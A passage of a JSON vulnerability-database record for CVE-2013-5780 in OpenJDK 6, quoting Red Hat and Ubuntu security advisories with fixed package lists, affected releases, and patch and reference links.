client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-3829.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4002.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5772.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5774.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5778.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5780.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5782.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5783.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5784.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5790.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5797.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5802.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5803.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5804.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5809.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5814.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5817.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5820.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5823.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5825.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5829.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5830.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5840.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5842.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5849.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5850.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFSeT/AXlSAg2UNWIIRAvBKAJ9vGve+1MyOR8lyLQffhBtOlcmxrgCfVKad\nebAHvPvYFmwsG11PQeLu+bI=\n=+ckf\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-2033-1\nNovember 21, 2013\n\nopenjdk-6 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 6. \n\nSoftware Description:\n- openjdk-6: Open Source Java implementation\n\nDetails:\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure and data integrity. An attacker could exploit these\nto expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783,\nCVE-2013-5804)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\navailability. An attacker could exploit these to cause a denial of service. \n(CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to data\nintegrity. (CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797,\nCVE-2013-5820)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure. An attacker could exploit these to expose sensitive\ndata over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790,\nCVE-2013-5840, CVE-2013-5849, CVE-2013-5851)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker could\nexploit these to cause a denial of service or expose sensitive data over\nthe network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829,\nCVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b27-1.12.6-1ubuntu0.12.04.4\n icedtea-6-jre-jamvm 6b27-1.12.6-1ubuntu0.12.04.4\n openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.4\n openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.12.04.4\n openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.12.04.4\n openjdk-6-jre-zero 6b27-1.12.6-1ubuntu0.12.04.4\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b27-1.12.6-1ubuntu0.10.04.4\n openjdk-6-jre 6b27-1.12.6-1ubuntu0.10.04.4\n openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.10.04.4\n openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.10.04.4\n openjdk-6-jre-zero 6b27-1.12.6-1ubuntu0.10.04.4\n\nThis update uses a new upstream release, which includes additional bug\nfixes. (CVE-2013-5803)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website", "sources": [ { "db": "NVD", "id": "CVE-2013-5780" }, { "db": "BID", "id": "63115" }, { "db": "VULMON", "id": "CVE-2013-5780" }, { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "124071" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "123941" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "124143" }, { "db": "PACKETSTORM", "id": "123722" } ], "trust": 1.98 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-5780", "trust": 2.8 }, { "db": "HITACHI", "id": "HS13-025", "trust": 2.0 }, { "db": "BID", "id": "63115", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201310-360", "trust": 0.6 }, { "db": "MCAFEE", "id": "SB10058", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2013-5780", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "124303", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "124071", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123649", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123941", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123921", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123689", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "124143", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123722", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5780" }, { "db": "BID", "id": "63115" }, { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "124071" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "123941" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "124143" }, { "db": "PACKETSTORM", "id": "123722" }, { "db": "CNNVD", "id": "CNNVD-201310-360" }, { "db": "NVD", "id": "CVE-2013-5780" } ] }, "id": "VAR-201310-0372", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-07-23T21:12:27.691000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Oracle Java SE/JRockit/Java SE Embedded Libraries Fixes for component security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=192768" }, { "title": "Red Hat: CVE-2013-5780", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2013-5780" }, { "title": "Red Hat: Important: java-1.5.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131509 - security advisory" }, { "title": "Red Hat: Important: java-1.6.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131505 - security advisory" }, { "title": "Red Hat: Important: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131447 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131451 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131508 - security advisory" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131793 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131507 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-oracle security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131440 - security advisory" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2033-1" }, { "title": "Amazon Linux AMI: ALAS-2013-246", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-246" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2089-1" }, { "title": "Amazon Linux AMI: ALAS-2013-235", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-235" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5780" }, { "db": "CNNVD", "id": "CNNVD-201310-360" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-5780" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "trust": 2.0, "url": "http://support.apple.com/kb/ht5982" }, { "trust": 2.0, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-025/index.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21655201" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2013-1505.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1451.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1447.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1507.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2033-1" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1793.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/63115" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1440.html" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2013/oct/msg00001.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2013-11/msg00023.html" }, { "trust": 1.7, "url": "http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=1018785" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00010.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00013.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1508.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1509.html" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=138674073720143\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=138674031212883\u0026w=2" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2089-1" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19101" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5814" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5802" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5804" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5772" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5778" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5782" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5797" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5809" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5803" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5774" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3829" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5780" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5783" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5784" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5820" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5817" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5790" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5823" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4002" }, { "trust": 0.5, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5817.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5797.html" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5782.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5802.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5803.html" }, { "trust": 0.5, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5778.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5823.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5783.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5780.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5850.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5842.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5849.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5840.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-3829.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5772.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5820.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5809.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5825.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5774.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5830.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5784.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5804.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5814.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-5829.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5830" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5825" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5840" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5842" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5849" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5850" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5851.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5829" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5790.html" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660748" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04031205" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04031212" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663589" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036549" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036518" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21660279" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_systems_director_storage_control_is_affected_by_vulnerabilities_in_ibm_java_sdk_cve_2014_0453_cve_2013_5772_cve_2013_5803_cv" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001745" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664964" }, { "trust": 0.3, "url": 